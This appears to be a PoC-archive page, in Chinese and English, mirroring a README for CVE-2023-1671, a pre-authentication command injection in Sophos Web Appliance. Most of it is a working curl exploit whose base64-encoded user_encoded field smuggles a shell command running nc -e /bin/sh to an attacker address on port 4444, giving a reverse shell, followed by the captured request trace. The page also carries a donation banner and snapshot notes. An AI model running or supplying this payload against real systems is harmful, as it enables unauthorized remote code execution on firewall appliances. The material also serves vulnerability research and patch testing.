支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: 8f6571ca6d294215354e571e4fe08dcd8f11ad0d

来源
关联漏洞
标题:Sophos Web Appliance 命令注入漏洞 (CVE-2023-1671)
Description:Sophos Web Appliance是Sophos公司的一款防火墙。 Sophos Web Appliance 4.3.10.4之前版本存在安全漏洞,该漏洞源于存在预授权命令注入漏洞,允许执行任意代码。
Description
Pre-Auth RCE in Sophos Web Appliance
介绍
# CVE-2023-1671
Pre-Auth RCE in Sophos Web Appliance

## Poc

```
curl -k --trace-ascii % "https://192.168.56.108/index.php?c=blocked&action=continue" -d "args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n "';nc -e /bin/sh 192.168.56.1 4444 #" | base64)"


#snip
=> Send header, 184 bytes (0xb8)
0000: POST /index.php?c=blocked&action=continue HTTP/1.1
0034: Host: 192.168.56.108
004a: User-Agent: curl/7.88.1
0063: Accept: */*
0070: Content-Length: 120
0085: Content-Type: application/x-www-form-urlencoded
00b6:
=> Send data, 120 bytes (0x78)
0000: args_reason=filetypewarn&url=16625&filetype=5831&user=4525&user_
0040: encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguNTYuMSA0NDQ0ICM=
```

## Reference

- https://vulncheck.com/blog/cve-2023-1671-analysis
文件快照

[4.0K] /data/pocs/8f6571ca6d294215354e571e4fe08dcd8f11ad0d └── [ 789] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。